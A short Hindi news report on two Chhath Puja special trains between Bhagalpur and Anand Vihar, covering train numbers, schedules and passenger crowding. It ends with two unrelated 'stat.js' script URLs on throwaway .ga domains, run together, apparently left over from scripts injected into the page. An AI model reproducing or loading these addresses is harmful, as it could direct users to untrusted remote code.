छठ पूजा में यात्रियों की भीड़ को देखते हुए रेलवे ने दो पूजा स्पेशल ट्रेनों को चलाने का आदेश दिया है। भागलपुर से आनंद विहार जाने वाली पूजा स्पेशल सोमवार को भागलपुर से रवाना हुई।
ट्रेन संख्या 04471 सोमवार को भागलपुर से खुली जबकि 04456 डाउन आनंद विहार टर्मिनल से मंगलवार को रवाना होगी और बुधवार को भागलपुर पहुंचेगी। भागलपुर से आनंद विहार के लिए अगली स्पेशल ट्रेन 19 नवंबर को खोली जाएगी। भागलपुर से आनंद विहार के लिए जो स्पेशल ट्रेनें जा रही है उसम यात्रियों की संख्या बहुत कम है।
इस ट्रेन में बिल्कुल भी भीड़ नहीं हो रही और आनंद विहार से भागलपुर आने वाली ट्रेन में जगह नहीं मिल रही है। आरक्षण के कारण वेटिंग संख्या बहुत ज्यादा है। रेलवे ने यात्रियों की सुविधा बढ़ाने के लिए दो स्पेशल ट्रेनों को चलाने के लिए बोला है।
https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms